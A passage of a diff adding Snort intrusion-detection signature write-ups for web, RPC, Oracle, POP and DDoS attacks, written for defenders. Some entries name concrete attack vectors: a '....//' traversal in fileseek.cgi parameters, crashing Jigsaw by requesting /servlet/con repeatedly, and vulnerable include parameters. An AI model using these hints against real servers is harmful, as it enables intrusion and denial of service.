+phpinfo() function.  When this file is accessed legitimately by
+someone testing a fresh install, this signature will also trigger.
+
+NOTE: The amount of information provided (installation directory, version 
+numbers, environment variables), could also constitute a vulnerability 
+if this file is present on a production web server.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Snort documentation contributed by Maarten Van Horenbeeck <maarten@daemon.be>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000418.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000418
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ashwebstudio Ashnews" application running on a webserver. Access to the file "ashheadlines.php" using a remote file being passed as the "pathtoashnews" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "pathtoashnews" parameter in the "ashheadlines.php" script used by the "Ashwebstudio Ashnews" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ashwebstudio Ashnews
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000817.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000817
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "SMF Forum" application running on a webserver. Access to the file "smf.php" using a remote file being passed as the "mosConfig_absolute_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "mosConfig_absolute_path" parameter in the "smf.php" script used by the "SMF Forum" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using SMF Forum
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1727.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1727
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1707.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1707
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3349.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3349
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2916.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2916
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure unregister_snapshot_repgroup
+. This procedure is included in
+sys.dbms_repcat_sna.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1936.txt
@@ -0,0 +1,53 @@
+Rule:
+
+--
+Sid:
+1936
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow condition in the Post Office Protocol (POP) command AUTH.
+
+--
+Impact:
+Possible remote execution of arbitrary code leading to a remote root 
+compromise.
+
+--
+Detailed Information:
+A vulnerability exists such that an attacker may overflow a buffer by 
+sending data where a line feed character should occur to a POP server 
+via the AUTH command.
+
+--
+Attack Scenarios:
+Simple. An attacker can supply specially crafted packets to a POP server
+via the AUTH function. 
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/561.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+561
+
+--
+Summary:
+This event is generated when a known response to a sucessful attack is
+detected.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when a known response to a sucessful attack is
+detected. Some applications do not perform stringent checks when validating
+the credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can be
+compromised and trust relationships between the victim server and other
+hosts can be exploited by the attacker.
+
+Events generated by rules in attack-responses.rules may indicate that an
+attack against a host has been sucessful.
+
+--
+Affected Systems:
+	Any vulnerable host.
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. An attacker might also exploit a
+weakness in a particular application or piece of software that will
+present the opportunity to gain access to the host.
+
+--
+Ease of Attack:
+Simple. Many exploits exist for various systems and software.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Care should be taken to investigate the source of the event. Check for
+signs of system compromise in log files. Check for listening services on
+high ports.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+OpenNap Specification
+http://opennap.sourceforge.net/napster.txt
+
+--
--- /dev/null
+++ b/doc/signatures/223.txt
@@ -0,0 +1,70 @@
+Rule:
+--
+Sid:
+223
+
+--
+Summary:
+This event is generated when a pong packet for the Trinoo (aka trin00) 
+DDos suite is detected.
+
+--
+Impact:
+This may indicate a compromised system or be the prelude to a
+Distributed Denial of Service (DDoS) attack.
+
+--
+Detailed Information:
+Once a Trinoo client has been installed on a compromised machine and a master is
+ready and listening, the master sends a "png" (ping) command to its drones in 
+an attempt to enumerate the drone network. A functioning client will respond to 
+port 31335/udp with the text "PONG".
+
+Once a machine becomes part of a trin00 network, a Denial of Service (DoS) 
+is typically initiated against one (or more) victim machines.
+
+--
+Affected Systems:
+ 
+--
+Attack Scenarios:
+As part of a large scale attack against a machine or a network, an
+attacker will compromise large numbers of machines which will form the
+army that the trin00 master daemon will command.  The master daemon
+typically instructs the clients to send mass-quantities of packets to
+a set of victim hosts.  If the traffic is sufficient, the victim
+machines will become resource deprived and thus endure a DoS condition.
+
+--
+Ease of Attack:
+Simple. Trinoo client and master programs are widely available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disconnect infected machine(s) from the network immediately.
+
+Use software to determine if a host has been compromised using a
+rootkit.
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by Jon Hart <warchild@spoofed.org>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+SANS:
+http://www.sans.org/newlook/resources/IDFAQ/trinoo.htm
+
+--
--- /dev/null
+++ b/doc/signatures/3332.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3332
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2738.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2738
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure alter_priority_number
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1831.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+
+1831
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a Denial of Service (DoS) condition in the Jigsaw web server from W3C.
+
+--
+Impact:
+Denial of Service.
+
+--
+Detailed Information:
+Jigsaw is a Java-based web server developed by W3C. Jigsaw version 2.2.1 is vulnerable to a DoS attack caused by improper handling of requests for DOS device names.
+
+Jigsaw web server versions prior to 2.2.1 (Build 20020711)  contain a Denial of Service vulnerability in a handler that processes HTTP requests for DOS device files. This may result in process threads hanging and a consumption of all available resources.
+
+
+--
+Affected Systems:
+	Jigsaw 2.2.1
+
+--
+Attack Scenarios:
+It is possible to crash the Jigsaw web server by requesting /servlet/con about 30 times.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+Certain HTTP requests may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest version of Jigsaw (2.2.1 Build 20020711 or later)
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Nawapong Nakjang (tony@ksc.net, tonie@thai.com)
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/5258/
+
+--
--- /dev/null
+++ b/doc/signatures/2207.txt
@@ -0,0 +1,56 @@
+Rule:  
+
+--
+Sid:
+2207
+
+--
+Summary:
+This event is generated when an attempt is made to access fileseek.cgi on an internal web server. This may indicate an attempt to exploit a directory traversal or remote command execution vulnerability in Wiley Computer Publishing Craig Patchett FileSeek.cgi.
+
+--
+Impact:
+Information gathering or remote execution of arbitrary code.
+
+--
+Detailed Information:
+FileSeek.cgi is an example script that locates and downloads files on a web server, available in "The CGI/Perl Cookbook," written by Craig Patchett and published by John Wiley & Sons. It contains two vulnerabilities due to erroneous parsing -- an attacker could use "....//" in the HEAD or FOOT parameter of an HTTP request to fileseek.cgi to view arbitrary files on the server or could use a similar method to execute shell commands on the web server. Both actions will be performed with the security context of the web server.
+
+--
+Affected Systems:
+Any web server running fileseek.cgi.
+
+--
+Attack Scenarios:
+An attacker sends a specially crafted HTTP request to a vulnerable web server, and is then able to view files on the server. In addition, an attacker could send a specially crafted HTTP request that contains shell commands to the web server. The web server would then attempt to execute the commands in the request.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+If a legitimate remote user accesses fileseek.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+Bugtraq
+http://www.securityfocus.com/bid/6783
+http://www.securityfocus.com/bid/6784
+
+--
--- /dev/null
+++ b/doc/signatures/1519.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+1519
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a flaw in 
+Apache that can result in a listing of directory contents.
+
+--
+Impact:
+Information disclosure.
+
+--
+Detailed Information:
+When "Multiviews" are used to negotiate a directory index, a specially 
+crafted URL can be used to obtain a directory listing instead of the 
+index page.
+
+--
+Affected Systems:
+	Apache 1.3.11, 1.3.14 to 1.3.20
+
+--
+Attack Scenarios:
+An attacker can use this exploit to view sensitive information
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+The presence of the string "/?M=D" within an incoming http packet can 
+cause this rule to generate an event.
+
+--
+False Negatives: 
+None known.
+
+--
+Corrective Action: 
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com> 
+Snort documentation contributed by Josh Sakofsky
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2936.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2936
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
--- /dev/null
+++ b/doc/signatures/1142.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1142
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3201.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+3201
+
+--
+Summary:
+This event is generated when an attempt is made to access the file
+httpodbc.dll.
+
+--
+Impact:
+Serious. Remote code execution is possible.
+
+--
+Detailed Information:
+Versions of Microsoft Internet Information Server (IIS) and Microsoft
+Personal Web Server (PWS) are vulnerable to a directory traversal attack
+that may lead to access of certain sensitive system files.
+
+This event is generated when an attempt is made to access the file
+httpodbc.dll. This may indicate nimda worm activity.
+
+--
+Affected Systems:
+	Microsoft IIS 3.0
+	Microsoft IIS 4.0
+	Microsoft PWS
+
+--
+Attack Scenarios:
+This may indicate worm activity.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3180.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3180
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000105.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+100000105
+
+--
+Summary:
+This event is generated when inappropriate content is detected in network 
+traffic.
+
+--
+Impact:
+Possible policy violation.
+
+--
+Detailed Information:
+This event is generated when inappropriate content is detected in network 
+traffic. Specifically, the content "lolita sex" was observed.
+
+--
+Affected Systems:
+ All systems.
+
+--
+Attack Scenarios:
+This event indicates that inappropriate content may have been accessed from a 
+host on the protected network.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+This may be a policy violation, refer to the appropriate internal policy.
+
+--
+Contributors:
+Original Rule writer rmkml <rmkml@free.fr>
+Sourcefire Vulnerability Research Team
+Alex Kirk <akirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3380.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3380
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1804.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1804
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft Internet Information
+Server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft Internet Information Server (IIS). Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft IIS
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/674.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+674
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft SQL.
+
+--
+Impact:
+Information gathering and data integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
